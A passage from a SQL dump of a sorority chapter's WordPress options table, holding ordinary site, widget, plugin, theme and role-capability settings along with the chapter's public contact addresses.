a','yes'),(26,'comment_moderation','1','yes'),(27,'moderation_notify','1','yes'),(28,'permalink_structure','/%postname%/','yes'),(17725,'widget_gform_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(17726,'gravityformsaddon_gravityformswebapi_version','1.0','yes'),(17727,'gform_pending_installation','','yes'),(17728,'gform_enable_background_updates','','yes'),(17729,'rg_form_version','2.1.2','yes'),(17718,'fresh_site','0','yes'),(2552,'fmc_admin_notice','a:2:{s:15:\"two_week_review\";a:2:{s:5:\"start\";s:10:\"12/20/2016\";s:3:\"int\";i:14;}s:16:\"one_week_support\";a:3:{s:5:\"start\";s:10:\"12/13/2016\";s:3:\"int\";i:7;s:9:\"dismissed\";i:1;}}','yes'),(30,'hack_file','0','yes'),(31,'blog_charset','UTF-8','yes'),(32,'moderation_keys','','no'),(34,'category_base','','yes'),(35,'ping_sites','http://rpc.pingomatic.com/','yes'),(36,'comment_max_links','2','yes'),(37,'gmt_offset','-5','yes'),(38,'default_email_category','1','yes'),(39,'recently_edited','a:5:{i:0;s:64:\"/home4/zphiblgz/public_html/wp-content/themes/hopeful/footer.php\";i:2;s:62:\"/home4/zphiblgz/public_html/wp-content/themes/hopeful/page.php\";i:3;s:64:\"/home4/zphiblgz/public_html/wp-content/themes/hopeful/header.php\";i:4;s:67:\"/home4/zphiblgz/public_html/wp-content/themes/hopeful/functions.php\";i:5;s:61:\"/home4/zphiblgz/public_html/wp-content/themes/hopeful/404.php\";}','no'),(40,'template','hopeful','yes'),(41,'stylesheet','hopeful','yes'),(439240,'finished_updating_comment_type','1','yes'),(44,'comment_registration','','yes'),(45,'html_type','text/html','yes'),(46,'use_trackback','0','yes'),(47,'default_role','subscriber','yes'),(48,'db_version','49752','yes'),(49,'uploads_use_yearmonth_folders','1','yes'),(50,'upload_path','','yes'),(51,'blog_public','1','yes'),(52,'default_link_category','2','yes'),(53,'show_on_front','page','yes'),(54,'tag_base','','yes'),(55,'show_avatars','1','yes'),(56,'avatar_rating','G','yes'),(57,'upload_url_path','','yes'),(58,'thumbnail_size_w','150','yes'),(59,'thumbnail_size_h','150','yes'),(60,'thumbnail_crop','1','yes'),(61,'medium_size_w','300','yes'),(62,'medium_size_h','300','yes'),(63,'avatar_default','mystery','yes'),(64,'large_size_w','1024','yes'),(65,'large_size_h','1024','yes'),(66,'image_default_link_type','none','yes'),(67,'image_default_size','','yes'),(68,'image_default_align','','yes'),(69,'close_comments_for_old_posts','1','yes'),(70,'close_comments_days_old','28','yes'),(71,'thread_comments','','yes'),(72,'thread_comments_depth','5','yes'),(73,'page_comments','','yes'),(74,'comments_per_page','50','yes'),(75,'default_comments_page','newest','yes'),(76,'comment_order','asc','yes'),(77,'sticky_posts','a:0:{}','yes'),(78,'widget_categories','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(79,'widget_text','a:10:{i:1;a:0:{}i:4;a:3:{s:5:\"title\";s:5:\"Email\";s:4:\"text\";s:18:\"youth@zphiblgz.org\";s:6:\"filter\";b:0;}i:5;a:3:{s:5:\"title\";s:5:\"Email\";s:4:\"text\";s:25:\"scholarships@zphiblgz.org\";s:6:\"filter\";b:0;}i:6;a:3:{s:5:\"title\";s:5:\"Email\";s:4:\"text\";s:15:\"pr@zphiblgz.org\";s:6:\"filter\";b:0;}i:7;a:3:{s:5:\"title\";s:5:\"Email\";s:4:\"text\";s:23:\"grammateus@zphiblgz.org\";s:6:\"filter\";b:0;}i:9;a:3:{s:5:\"title\";s:7:\"Connect\";s:4:\"text\";s:98:\"Zeta Phi Beta Sorority, Incorporated\r\nLambda Gamma Zeta Chapter\r\nP.O. Box 7002\r\nColumbia, MD 21045\";s:6:\"filter\";b:0;}i:12;a:3:{s:5:\"title\";s:6:\"Follow\";s:4:\"text\";s:0:\"\";s:6:\"filter\";b:0;}i:13;a:3:{s:5:\"title\";s:7:\"Contact\";s:4:\"text\";s:0:\"\";s:6:\"filter\";b:0;}i:14;a:3:{s:5:\"title\";s:12:\"Get In Touch\";s:4:\"text\";s:0:\"\";s:6:\"filter\";b:0;}s:12:\"_multiwidget\";i:1;}','yes'),(80,'widget_rss','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(81,'uninstall_plugins','a:10:{s:37:\"document-gallery/document-gallery.php\";a:2:{i:0;s:8:\"DG_Setup\";i:1;s:9:\"uninstall\";}s:53:\"simple-custom-post-order/simple-custom-post-order.php\";s:18:\"scporder_uninstall\";s:35:\"obfuscate-email/obfuscate-email.php\";a:2:{i:0;s:18:\"c2c_ObfuscateEmail\";i:1;s:9:\"uninstall\";}s:47:\"google-sitemap-plugin/google-sitemap-plugin.php\";s:23:\"gglstmp_delete_settings\";s:21:\"wp-hooks/wp-hooks.php\";s:19:\"amw_hooks_uninstall\";s:27:\"ninja-forms/ninja-forms.php\";s:21:\"ninja_forms_uninstall\";s:41:\"better-wp-security/better-wp-security.php\";a:2:{i:0;s:10:\"ITSEC_Core\";i:1;s:16:\"handle_uninstall\";}s:39:\"contact-form-7-paypal-add-on/paypal.php\";s:15:\"cf7pp_uninstall\";s:57:\"easy-paypal-events-tickets/easy-paypal-events-tickets.php\";a:2:{i:0;s:21:\"wpeevent_wpeasyevents\";i:1;s:18:\"wpeevent_uninstall\";}s:43:\"gf-form-multicolumn/gf-form-multicolumn.php\";s:9:\"uninstall\";}','no'),(82,'timezone_string','','yes'),(83,'page_for_posts','0','yes'),(84,'page_on_front','6','yes'),(85,'default_post_format','0','yes'),(86,'link_manager_enabled','0','yes'),(87,'finished_splitting_shared_terms','1','yes'),(88,'site_icon','0','yes'),(89,'medium_large_size_w','768','yes'),(90,'medium_large_size_h','0','yes'),(91,'initial_db_version','37965','yes'),(92,'lwz_user_roles','a:11:{s:13:\"administrator\";a:2:{s:4:\"name\";s:13:\"Administrator\";s:12:\"capabilities\";a:273:{s:13:\"switch_themes\";b:1;s:11:\"edit_themes\";b:1;s:16:\"activate_plugins\";b:1;s:12:\"edit_plugins\";b:1;s:10:\"edit_users\";b:1;s:10:\"edit_files\";b:1;s:14:\"manage_options\";b:1;s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:6:\"import\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:8:\"level_10\";b:1;s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:12:\"delete_users\";b:1;s:12:\"create_users\";b:1;s:17:\"unfiltered_upload\";b:1;s:14:\"edit_dashboard\";b:1;s:14:\"update_plugins\";b:1;s:14:\"delete_plugins\";b:1;s:15:\"install_plugins\";b:1;s:13:\"update_themes\";b:1;s:14:\"install_themes\";b:1;s:11:\"update_core\";b:1;s:10:\"list_users\";b:1;s:12:\"remove_users\";b:1;s:13:\"promote_users\";b:1;s:18:\"edit_theme_options\";b:1;s:13:\"delete_themes\";b:1;s:6:\"export\";b:1;s:17:\"cuar_view_account\";b:1;s:17:\"cuar_edit_account\";b:1;s:16:\"cuar_pp_list_all\";b:1;s:12:\"cuar_pp_edit\";b:1;s:14:\"cuar_pp_delete\";b:1;s:12:\"cuar_pp_read\";b:1;s:25:\"cuar_pp_manage_categories\";b:1;s:23:\"cuar_pp_edit_categories\";b:1;s:25:\"cuar_pp_delete_categories\";b:1;s:25:\"cuar_pp_assign_categories\";b:1;s:15:\"cuar_view_pages\";b:1;s:31:\"cuar_view_any_cuar_private_page\";b:1;s:26:\"cuar_pf_manage_attachments\";b:1;s:16:\"cuar_pf_list_all\";b:1;s:12:\"cuar_pf_edit\";b:1;s:14:\"cuar_pf_delete\";b:1;s:12:\"cuar_pf_read\";b:1;s:25:\"cuar_pf_manage_categories\";b:1;s:23:\"cuar_pf_edit_categories\";b:1;s:25:\"cuar_pf_delete_categories\";b:1;s:25:\"cuar_pf_assign_categories\";b:1;s:15:\"cuar_view_files\";b:1;s:31:\"cuar_view_any_cuar_private_file\";b:1;s:23:\"cuar_access_admin_panel\";b:1;s:23:\"view-customer-area-menu\";b:1;s:17:\"cuar_view_top_bar\";b:1;s:17:\"manage_events_cap\";b:1;s:23:\"manage_ticket_types_cap\";b:1;s:25:\"manage_discount_codes_cap\";b:1;s:17:\"manage_orders_cap\";b:1;s:20:\"manage_attendees_cap\";b:1;s:27:\"manage_ticket_templates_cap\";b:1;s:19:\"delete_checkins_cap\";b:1;s:20:\"delete_attendees_cap\";b:1;s:19:\"manage_settings_cap\";b:1;s:15:\"save_ticket_cap\";b:1;s:16:\"add_discount_cap\";b:1;s:17:\"publish_tc_events\";b:1;s:14:\"edit_tc_events\";b:1;s:21:\"edit_others_tc_events\";b:1;s:16:\"delete_tc_events\";b:1;s:23:\"delete_others_tc_events\";b:1;s:22:\"read_private_tc_events\";b:1;s:13:\"edit_tc_event\";b:1;s:15:\"delete_tc_event\";b:1;s:13:\"read_tc_event\";b:1;s:24:\"edit_published_tc_events\";b:1;s:22:\"edit_private_tc_events\";b:1;s:24:\"delete_private_tc_events\";b:1;s:26:\"delete_published_tc_events\";b:1;s:16:\"create_tc_events\";b:1;s:18:\"publish_tc_tickets\";b:1;s:15:\"edit_tc_tickets\";b:1;s:14:\"edit_tc_ticket\";b:1;s:22:\"edit_others_tc_tickets\";b:1;s:17:\"delete_tc_tickets\";b:1;s:24:\"delete_others_tc_tickets\";b:1;s:23:\"read_private_tc_tickets\";b:1;s:16:\"delete_tc_ticket\";b:1;s:14:\"read_tc_ticket\";b:1;s:25:\"edit_published_tc_tickets\";b:1;s:23:\"edit_private_tc_tickets\";b:1;s:25:\"delete_private_tc_tickets\";b:1;s:27:\"delete_published_tc_tickets\";b:1;s:17:\"create_tc_tickets\";b:1;s:24:\"edit_tc_tickets_instance\";b:1;s:24:\"read_tc_tickets_instance\";b:1;s:26:\"delete_tc_tickets_instance\";b:1;s:27:\"create_tc_tickets_instances\";b:1;s:25:\"edit_tc_tickets_instances\";b:1;s:38:\"edit_others_posts_tc_tickets_instances\";b:1;s:28:\"publish_tc_tickets_instances\";b:1;s:33:\"read_private_tc_tickets_instances\";b:1;s:27:\"delete_tc_tickets_instances\";b:1;s:35:\"delete_private_tc_tickets_instances\";b:1;s:37:\"delete_published_tc_tickets_instances\";b:1;s:34:\"delete_others_tc_tickets_instances\";b:1;s:33:\"edit_private_tc_tickets_instances\";b:1;s:35:\"edit_published_tc_tickets_instances\";b:1;s:13:\"edit_tc_order\";b:1;s:13:\"read_tc_order\";b:1;s:15:\"delete_tc_order\";b:1;s:16:\"create_tc_orders\";b:1;s:14:\"edit_tc_orders\";b:1;s:27:\"edit_others_posts_tc_orders\";b:1;s:17:\"publish_tc_orders\";b:1;s:22:\"read_private_tc_orders\";b:1;s:16:\"delete_tc_orders\";b:1;s:24:\"delete_private_tc_orders\";b:1;s:26:\"delete_published_tc_orders\";b:1;s:23:\"delete_others_tc_orders\";b:1;s:22:\"edit_private_tc_orders\";b:1;s:24:\"edit_published_tc_orders\";b:1;s:18:\"manage_woocommerce\";b:1;s:24:\"view_woocommerce_reports\";b:1;s:12:\"edit_product\";b:1;s:12:\"read_product\";b:1;s:14:\"delete_product\";b:1;s:13:\"edit_products\";b:1;s:20:\"edit_others_products\";b:1;s:16:\"publish_products\";b:1;s:21:\"read_private_products\";b:1;s:15:\"delete_products\";b:1;s:23:\"delete_private_products\";b:1;s:25:\"delete_published_products\";b:1;s:22:\"delete_others_products\";b:1;s:21:\"edit_private_products\";b:1;s:23:\"edit_published_products\";b:1;s:20:\"manage_product_terms\";b:1;s:18:\"edit_product_terms\";b:1;s:20:\"delete_product_terms\";b:1;s:20:\"assign_product_terms\";b:1;s:15:\"edit_shop_order\";b:1;s:15:\"read_shop_order\";b:1;s:17:\"delete_shop_order\";b:1;s:16:\"edit_shop_orders\";b:1;s:23:\"edit_others_shop_orders\";b:1;s:19:\"publish_shop_orders\";b:1;s:24:\"read_private_shop_orders\";b:1;s:18:\"delete_shop_orders\";b:1;s:26:\"delete_private_shop_orders\";b:1;s:28:\"delete_published_shop_orders\";b:1;s:25:\"delete_others_shop_orders\";b:1;s:24:\"edit_private_shop_orders\";b:1;s:26:\"edit_published_shop_orders\";b:1;s:23:\"manage_shop_order_terms\";b:1;s:21:\"edit_shop_order_terms\";b:1;s:23:\"delete_shop_order_terms\";b:1;s:23:\"assign_shop_order_terms\";b:1;s:16:\"edit_shop_coupon\";b:1;s:16:\"read_shop_coupon\";b:1;s:18:\"delete_shop_coupon\";b:1;s:17:\"edit_shop_coupons\";b:1;s:24:\"edit_others_shop_coupons\";b:1;s:20:\"publish_shop_coupons\";b:1;s:25:\"read_private_shop_coupons\";b:1;s:19:\"delete_shop_coupons\";b:1;s:27:\"delete_private_shop_coupons\";b:1;s:29:\"delete_published_shop_coupons\";b:1;s:26:\"delete_others_shop_coupons\";b:1;s:25:\"edit_private_shop_coupons\";b:1;s:27:\"edit_published_shop_coupons\";b:1;s:24:\"manage_shop_coupon_terms\";b:1;s:22:\"edit_shop_coupon_terms\";b:1;s:24:\"delete_shop_coupon_terms\";b:1;s:24:\"assign_shop_coupon_terms\";b:1;s:17:\"edit_shop_webhook\";b:1;s:17:\"read_shop_webhook\";b:1;s:19:\"delete_shop_webhook\";b:1;s:18:\"edit_shop_webhooks\";b:1;s:25:\"edit_others_shop_webhooks\";b:1;s:21:\"publish_shop_webhooks\";b:1;s:26:\"read_private_shop_webhooks\";b:1;s:20:\"delete_shop_webhooks\";b:1;s:28:\"delete_private_shop_webhooks\";b:1;s:30:\"delete_published_shop_webhooks\";b:1;s:27:\"delete_others_shop_webhooks\";b:1;s:26:\"edit_private_shop_webhooks\";b:1;s:28:\"edit_published_shop_webhooks\";b:1;s:25:\"manage_shop_webhook_terms\";b:1;s:23:\"edit_shop_webhook_terms\";b:1;s:25:\"delete_shop_webhook_terms\";b:1;s:25:\"assign_shop_webhook_terms\";b:1;s:6:\"sp_cdm\";b:1;s:14:\"sp_cdm_vendors\";b:1;s:15:\"sp_cdm_settings\";b:1;s:15:\"sp_cdm_projects\";b:1;s:15:\"sp_cdm_uploader\";b:1;s:16:\"sp_cdm_user_logs\";b:1;s:11:\"sp_cdm_help\";b:1;s:12:\"sp_cdm_forms\";b:1;s:13:\"sp_cdm_groups\";b:1;s:17:\"sp_cdm_categories\";b:1;s:15:\"sp_cdm_top_menu\";b:1;s:26:\"sp_cdm_show_folders_as_nav\";b:1;s:14:\"ure_edit_roles\";b:1;s:16:\"ure_create_roles\";b:1;s:16:\"ure_delete_roles\";b:1;s:23:\"ure_create_capabilities\";b:1;s:23:\"ure_delete_capabilities\";b:1;s:18:\"ure_manage_options\";b:1;s:15:\"ure_reset_roles\";b:1;s:15:\"wpseo_bulk_edit\";b:1;s:16:\"manage_downloads\";b:1;s:21:\"access_server_browser\";b:1;s:10:\"delete_ads\";b:1;s:17:\"delete_others_ads\";b:1;s:20:\"delete_published_ads\";b:1;s:8:\"edit_ads\";b:1;s:15:\"edit_others_ads\";b:1;s:16:\"edit_private_ads\";b:1;s:18:\"edit_published_ads\";b:1;s:11:\"publish_ads\";b:1;s:16:\"read_private_ads\";b:1;s:19:\"delete_applications\";b:1;s:26:\"delete_others_applications\";b:1;s:29:\"delete_published_applications\";b:1;s:17:\"edit_applications\";b:1;s:24:\"edit_others_applications\";b:1;s:25:\"edit_private_applications\";b:1;s:27:\"edit_published_applications\";b:1;s:20:\"publish_applications\";b:1;s:19:\"create_applications\";b:1;s:25:\"read_private_applications\";b:1;s:20:\"wpseo_manage_options\";b:1;s:11:\"hustle_menu\";b:1;s:18:\"hustle_edit_module\";b:1;s:13:\"hustle_create\";b:1;s:24:\"hustle_edit_integrations\";b:1;s:20:\"hustle_access_emails\";b:1;s:20:\"hustle_edit_settings\";b:1;s:16:\"hustle_analytics\";b:1;}}s:6:\"author\";a:2:{s:4:\"name\";s:6:\"Author\";s:12:\"capabilities\";a:12:{s:12:\"upload_files\";b:1;s:10:\"edit_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:12:\"cuar_pf_edit\";b:1;s:12:\"cuar_pf_read\";b:1;}}s:11:\"contributor\";a:2:{s:4:\"name\";s:11:\"Contributor\";s:12:\"capabilities\";a:6:{s:10:\"edit_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;s:12:\"cuar_pf_read\";b:1;}}s:8:\"customer\";a:2:{s:4:\"name\";s:8:\"Customer\";s:12:\"capabilities\";a:1:{s:4:\"read\";b:1;}}s:6:\"editor\";a:2:{s:4:\"name\";s:6:\"Editor\";s:12:\"capabilities\";a:21:{s:7:\"level_0\";b:1;s:7:\"level_1\";b:1;s:7:\"level_2\";b:1;s:7:\"level_3\";b:1;s:7:\"level_4\";b:1;s:7:\"level_5\";b:1;s:7:\"level_6\";b:1;s:7:\"level_7\";b:1;s:6:\"sp_cdm\";b:1;s:17:\"sp_cdm_categories\";b:1;s:12:\"sp_cdm_forms\";b:1;s:13:\"sp_cdm_groups\";b:1;s:11:\"sp_cdm_help\";b:1;s:15:\"sp_cdm_projects\";b:1;s:15:\"sp_cdm_settings\";b:1;s:26:\"sp_cdm_show_folders_as_nav\";b:1;s:15:\"sp_cdm_top_menu\";b:1;s:15:\"sp_cdm_uploader\";b:1;s:16:\"sp_cdm_user_logs\";b:1;s:14:\"sp_cdm_vendors\";b:1;s:15:\"wpseo_bulk_edit\";b:1;}}s:12:\"shop_manager\";a:2:{s:4:\"name\";s:12:\"Shop Manager\";s:12:\"capabilities\";a:110:{s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:4:\"read\";b:1;s:18:\"read_private_pages\";b:1;s:18:\"read_private_posts\";b:1;s:10:\"edit_users\";b:1;s:10:\"edit_posts\";b:1;s:10:\"edit_pages\";b:1;s:20:\"edit_published_posts\";b:1;s:20:\"edit_published_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"edit_private_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:17:\"edit_others_pages\";b:1;s:13:\"publish_posts\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_posts\";b:1;s:12:\"delete_pages\";b:1;s:20:\"delete_private_pages\";b:1;s:20:\"delete_private_posts\";b:1;s:22:\"delete_published_pages\";b:1;s:22:\"delete_published_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:19:\"delete_others_pages\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:17:\"moderate_comments\";b:1;s:15:\"unfiltered_html\";b:1;s:12:\"upload_files\";b:1;s:6:\"export\";b:1;s:6:\"import\";b:1;s:10:\"list_users\";b:1;s:18:\"manage_woocommerce\";b:1;s:24:\"view_woocommerce_reports\";b:1;s:12:\"edit_product\";b:1;s:12:\"read_product\";b:1;s:14:\"delete_product\";b:1;s:13:\"edit_products\";b:1;s:20:\"edit_others_products\";b:1;s:16:\"publish_products\";b:1;s:21:\"read_private_products\";b:1;s:15:\"delete_products\";b:1;s:23:\"delete_private_products\";b:1;s:25:\"delete_published_products\";b:1;s:22:\"delete_others_products\";b:1;s:21:\"edit_private_products\";b:1;s:23:\"edit_published_products\";b:1;s:20:\"manage_product_terms\";b:1;s:18:\"edit_product_terms\";b:1;s:20:\"delete_product_terms\";b:1;s:20:\"assign_product_terms\";b:1;s:15:\"edit_shop_order\";b:1;s:15:\"read_shop_order\";b:1;s:17:\"delete_shop_order\";b:1;s:16:\"edit_shop_orders\";b:1;s:23:\"edit_others_shop_orders\";b:1;s:19:\"publish_shop_orders\";b:1;s:24:\"read_private_shop_orders\";b:1;s:18:\"delete_shop_orders\";b:1;s:26:\"delete_private_shop_orders\";b:1;s:28:\"delete_published_shop_orders\";b:1;s:25:\"delete_others_shop_orders\";b:1;s:24:\"edit_private_shop_orders\";b:1;s:26:\"edit_published_shop_orders\";b:1;s:23:\"manage_shop_order_terms\";b:1;s:21:\"edit_shop_order_terms\";b:1;s:23:\"delete_shop_order_terms\";b:1;s:23:\"assign_shop_order_terms\";b:1;s:16:\"edit_shop_coupon\";b:1;s:16:\"read_shop_coupon\";b:1;s:18:\"delete_shop_coupon\";b:1;s:17:\"edit_shop_coupons\";b:1;s:24:\"edit_others_shop_coupons\";b:1;s:20:\"publish_shop_coupons\";b:1;s:25:\"read_private_shop_coupons\";b:1;s:19:\"delete_shop_coupons\";b:1;s:27:\"delete_private_shop_coupons\";b:1;s:29:\"delete_published_shop_coupons\";b:1;s:26:\"delete_others_shop_coupons\";b:1;s:25:\"edit_private_shop_coupons\";b:1;s:27:\"edit_published_shop_coupons\";b:1;s:24:\"manage_shop_coupon_terms\";b:1;s:22:\"edit_shop_coupon_terms\";b:1;s:24:\"delete_shop_coupon_terms\";b:1;s:24:\"assign_shop_coupon_terms\";b:1;s:17:\"edit_shop_webhook\";b:1;s:17:\"read_shop_webhook\";b:1;s:19:\"delete_shop_webhook\";b:1;s:18:\"edit_shop_webhooks\";b:1;s:25:\"edit_others_shop_webhooks\";b:1;s:21:\"publish_shop_webhooks\";b:1;s:26:\"read_private_shop_webhooks\";b:1;s:20:\"delete_shop_webhooks\";b:1;s:28:\"delete_private_shop_webhooks\";b:1;s:30:\"delete_published_shop_webhooks\";b:1;s:27:\"delete_others_shop_webhooks\";b:1;s:26:\"edit_private_shop_webhooks\";b:1;s:28:\"edit_published_shop_webhooks\";b:1;s:25:\"manage_shop_webhook_terms\";b:1;s:23:\"edit_shop_webhook_terms\";b:1;s:25:\"delete_shop_webhook_terms\";b:1;s:25:\"assign_shop_webhook_terms\";b:1;}}s:5:\"staff\";a:2:{s:4:\"name\";s:5:\"Staff\";s:12:\"capabilities\";a:13:{s:14:\"edit_tc_events\";b:1;s:24:\"edit_tc_tickets_instance\";b:1;s:24:\"read_tc_tickets_instance\";b:1;s:27:\"create_tc_tickets_instances\";b:1;s:25:\"edit_tc_tickets_instances\";b:1;s:38:\"edit_others_posts_tc_tickets_instances\";b:1;s:28:\"publish_tc_tickets_instances\";b:1;s:33:\"read_private_tc_tickets_instances\";b:1;s:33:\"edit_private_tc_tickets_instances\";b:1;s:35:\"edit_published_tc_tickets_instances\";b:1;s:10:\"edit_posts\";b:1;s:4:\"read\";b:1;s:21:\"access_server_browser\";b:1;}}s:10:\"subscriber\";a:2:{s:4:\"name\";s:10:\"Subscriber\";s:12:\"capabilities\";a:13:{s:12:\"cuar_pf_read\";b:1;s:7:\"level_0\";b:1;s:4:\"read\";b:1;s:6:\"sp_cdm\";b:1;s:17:\"sp_cdm_categories\";b:1;s:12:\"sp_cdm_forms\";b:1;s:13:\"sp_cdm_groups\";b:1;s:11:\"sp_cdm_help\";b:1;s:15:\"sp_cdm_projects\";b:1;s:15:\"sp_cdm_settings\";b:1;s:26:\"sp_cdm_show_folders_as_nav\";b:1;s:15:\"sp_cdm_top_menu\";b:1;s:15:\"sp_cdm_uploader\";b:1;}}s:11:\"aol_manager\";a:2:{s:4:\"name\";s:11:\"AOL Manager\";s:12:\"capabilities\";a:20:{s:10:\"delete_ads\";b:1;s:17:\"delete_others_ads\";b:1;s:20:\"delete_published_ads\";b:1;s:8:\"edit_ads\";b:1;s:15:\"edit_others_ads\";b:1;s:16:\"edit_private_ads\";b:1;s:18:\"edit_published_ads\";b:1;s:11:\"publish_ads\";b:1;s:16:\"read_private_ads\";b:1;s:19:\"delete_applications\";b:1;s:26:\"delete_others_applications\";b:1;s:29:\"delete_published_applications\";b:1;s:17:\"edit_applications\";b:1;s:24:\"edit_others_applications\";b:1;s:25:\"edit_private_applications\";b:1;s:27:\"edit_published_applications\";b:1;s:20:\"publish_applications\";b:0;s:19:\"create_applications\";b:0;s:25:\"read_private_applications\";b:1;s:4:\"read\";b:1;}}s:13:\"wpseo_manager\";a:2:{s:4:\"name\";s:11:\"SEO Manager\";s:12:\"capabilities\";a:24:{s:7:\"level_0\";b:1;s:7:\"level_1\";b:1;s:7:\"level_2\";b:1;s:7:\"level_3\";b:1;s:7:\"level_4\";b:1;s:7:\"level_5\";b:1;s:7:\"level_6\";b:1;s:7:\"level_7\";b:1;s:6:\"sp_cdm\";b:1;s:17:\"sp_cdm_categories\";b:1;s:12:\"sp_cdm_forms\";b:1;s:13:\"sp_cdm_groups\";b:1;s:11:\"sp_cdm_help\";b:1;s:15:\"sp_cdm_projects\";b:1;s:15:\"sp_cdm_settings\";b:1;s:26:\"sp_cdm_show_folders_as_nav\";b:1;s:15:\"sp_cdm_top_menu\";b:1;s:15:\"sp_cdm_uploader\";b:1;s:16:\"sp_cdm_user_logs\";b:1;s:14:\"sp_cdm_vendors\";b:1;s:15:\"wpseo_bulk_edit\";b:1;s:28:\"wpseo_edit_advanced_metadata\";b:1;s:20:\"wpseo_manage_options\";b:1;s:23:\"view_site_health_checks\";b:1;}}s:12:\"wpseo_editor\";a:2:{s:4:\"name\";s:10:\"SEO Editor\";s:12:\"capabilities\";a:22:{s:7:\"level_0\";b:1;s:7:\"level_1\";b:1;s:7:\"level_2\";b:1;s:7:\"level_3\";b:1;s:7:\"level_4\";b:1;s:7:\"level_5\";b:1;s:7:\"level_6\";b:1;s:7:\"level_7\";b:1;s:6:\"sp_cdm\";b:1;s:17:\"sp_cdm_categories\";b:1;s:12:\"sp_cdm_forms\";b:1;s:13:\"sp_cdm_groups\";b:1;s:11:\"sp_cdm_help\";b:1;s:15:\"sp_cdm_projects\";b:1;s:15:\"sp_cdm_settings\";b:1;s:26:\"sp_cdm_show_folders_as_nav\";b:1;s:15:\"sp_cdm_top_menu\";b:1;s:15:\"sp_cdm_uploader\";b:1;s:16:\"sp_cdm_user_logs\";b:1;s:14:\"sp_cdm_vendors\";b:1;s:15:\"wpseo_bulk_edit\";b:1;s:28:\"wpseo_edit_advanced_metadata\";b:1;}}}','yes'),(93,'widget_search','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(94,'widget_recent-posts','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(95,'widget_recent-comments','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(96,'widget_archives','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(97,'widget_meta','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(98,'sidebars_widgets','a:10:{s:19:\"wp_inactive_widgets\";a:0:{}s:4:\"main\";a:1:{i:0;s:7:\"text-12\";}s:24:\"ts-sidebar-5843807ec3a57\";a:1:{i:0;s:7:\"text-13\";}s:24:\"ts-sidebar-586bd3c733846\";a:1:{i:0;s:6:\"text-4\";}s:24:\"ts-sidebar-586bd3db69604\";a:1:{i:0;s:6:\"text-5\";}s:24:\"ts-sidebar-586bd3e7acac1\";a:1:{i:0;s:6:\"text-7\";}s:24:\"ts-sidebar-586bd3ee2d53c\";a:1:{i:0;s:6:\"text-6\";}s:24:\"ts-sidebar-586bd3f58a514\";a:1:{i:0;s:7:\"text-14\";}s:24:\"ts-sidebar-5875a66db9e4b\";a:1:{i:0;s:6:\"text-9\";}s:13:\"array_version\";i:3;}','yes'),(157,'hopeful_general','a:33:{s:16:\"enable_preloader\";s:1:\"N\";s:15:\"onepage_website\";s:1:\"N\";s:22:\"featured_image_in_post\";s:1:\"Y\";s:15:\"enable_lightbox\";s:1:\"Y\";s:19:\"enable_imagesloaded\";s:1:\"Y\";s:22:\"human_type_date_format\";s:1:\"Y\";s:14:\"comment_system\";s:7:\"default\";s:11:\"facebook_id\";s:0:\"\";s:19:\"enable_facebook_box\";s:1:\"N\";s:13:\"facebook_name\";s:0:\"\";s:17:\"show_wp_admin_bar\";s:1:\"Y\";s:18:\"enable_sticky_menu\";s:1:\"N\";s:20:\"sticky_menu_bg_color\";s:7:\"#FFFFFF\";s:22:\"sticky_menu_text_color\";s:7:\"#444444\";s:16:\"enable_mega_menu\";s:1:\"N\";s:4:\"like\";s:1:\"n\";s:10:\"like_icons\";s:5:\"heart\";s:16:\"decorative_icons\";s:18:\"icon-rhomb-outline\";s:13:\"tracking_code\";s:0:\"\";s:12:\"grid_excerpt\";s:3:\"260\";s:12:\"list_excerpt\";s:3:\"600\";s:15:\"bigpost_excerpt\";s:3:\"260\";s:16:\"timeline_excerpt\";s:3:\"260\";s:10:\"slug_video\";s:5:\"video\";s:19:\"slug_video_taxonomy\";s:17:\"videos_categories\";s:14:\"slug_portfolio\";s:9:\"portfolio\";s:23:\"slug_portfolio_taxonomy\";s:20:\"